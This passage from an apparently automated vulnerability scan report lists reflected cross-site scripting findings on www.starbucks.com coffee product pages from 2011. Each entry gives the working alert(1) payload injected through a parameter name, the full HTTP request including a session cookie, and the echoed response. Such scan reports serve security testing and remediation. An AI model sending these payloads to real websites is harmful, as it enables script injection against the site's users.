The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c38"style="x:expression(alert(1))"f99dc12b612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style%3d"x%3aexpression(alert(1))"f99dc12b612=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:42 GMT
Connection: close
Content-Length: 42379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?48c38"style="x:expression(alert(1))"f99dc12b612=1" />
...[SNIP]...

1.644. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76daa"%3balert(1)//724980535d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76daa";alert(1)//724980535d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa"%3balert(1)//724980535d7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:44 GMT
Connection: close
Content-Length: 42284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
shvars.playerType = "reserve";
       flashvars.playlistID = "624827690001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara?76daa";alert(1)//724980535d7=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

1.645. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bcf0f"style="x:expression(alert(1))"ad29da1d3f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style%3d"x%3aexpression(alert(1))"ad29da1d3f1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:01 GMT
Connection: close
Content-Length: 41036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?bcf0f"style="x:expression(alert(1))"ad29da1d3f1=1" />
...[SNIP]...

1.646. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26c27"%3balert(1)//b005536df9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c27";alert(1)//b005536df9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27"%3balert(1)//b005536df9f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:18:06 GMT
Connection: close
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "679100977001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia?26c27";alert(1)//b005536df9f=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

1.647. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2056f"style%3d"x%3aexpression(alert(1))"74970e702cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2056f"style="x:expression(alert(1))"74970e702cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style%3d"x%3aexpression(alert(1))"74970e702cd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:48 GMT
Connection: close
Content-Length: 41081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?2056f"style="x:expression(alert(1))"74970e702cd=1" />
...[SNIP]...

1.648. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-blue-java

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c23"%3balert(1)//aabb77efc8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 51c23";alert(1)//aabb77efc8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-blue-java?51c23"%3balert(1)//aabb77efc8a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:49 GMT
Connection: close
Content-Length: 40986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "731783176001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java?51c23";alert(1)//aabb77efc8a=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

1.649. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e73"style="x:expression(alert(1))"e0a45db438b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style%3d"x%3aexpression(alert(1))"e0a45db438b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:34 GMT
Connection: close
Content-Length: 40877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?62e73"style="x:expression(alert(1))"e0a45db438b=1" />
...[SNIP]...

1.650. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac74"%3balert(1)//93e8ea141e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ac74";alert(1)//93e8ea141e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74"%3balert(1)//93e8ea141e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:37 GMT
Connection: close
Content-Length: 40777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
rs = {};
       flashvars.playerType = "reserve";
       flashvars.playlistID = "735248429001";
       flashvars.playerLocation = "http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria?5ac74";alert(1)//93e8ea141e=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

1.651. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c836e"%3balert(1)//ea1e4924121 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c836e";alert(1)//ea1e4924121 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/via?c836e"%3balert(1)//ea1e4924121=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:54 GMT
Connection: close
Content-Length: 50298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "620273805001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/via?c836e";alert(1)//ea1e4924121=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.652. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46d0d"style="x:expression(alert(1))"aec8401d6e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via?46d0d"style%3d"x%3aexpression(alert(1))"aec8401d6e5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:48 GMT
Connection: close
Content-Length: 50393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via?46d0d"style="x:expression(alert(1))"aec8401d6e5=1" />
...[SNIP]...

1.653. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/flavored-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb780"style%3d"x%3aexpression(alert(1))"017ad330597 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bb780"style="x:expression(alert(1))"017ad330597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/flavored-coffee?bb780"style%3d"x%3aexpression(alert(1))"017ad330597=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:01 GMT
Connection: close
Content-Length: 50326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/flavored-coffee?bb780"style="x:expression(alert(1))"017ad330597=1" />
...[SNIP]...

1.654. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b90"style="x:expression(alert(1))"6c41d8ffcf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/via/instant-coffee?47b90"style%3d"x%3aexpression(alert(1))"6c41d8ffcf1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:17:06 GMT
Connection: close
Content-Length: 50600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/via/instant-coffee?47b90"style="x:expression(alert(1))"6c41d8ffcf1=1" />
...[SNIP]...

1.655. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70376"style%3d"x%3aexpression(alert(1))"4e8579796e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70376"style="x:expression(alert(1))"4e8579796e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee?70376"style%3d"x%3aexpression(alert(1))"4e8579796e6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:10 GMT
Connection: close
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee?70376"style="x:expression(alert(1))"4e8579796e6=1" />
...[SNIP]...

1.656. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4774c"style="x:expression(alert(1))"403ec5c4484 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/africa-arabia?4774c"style%3d"x%3aexpression(alert(1))"403ec5c4484=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:38 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
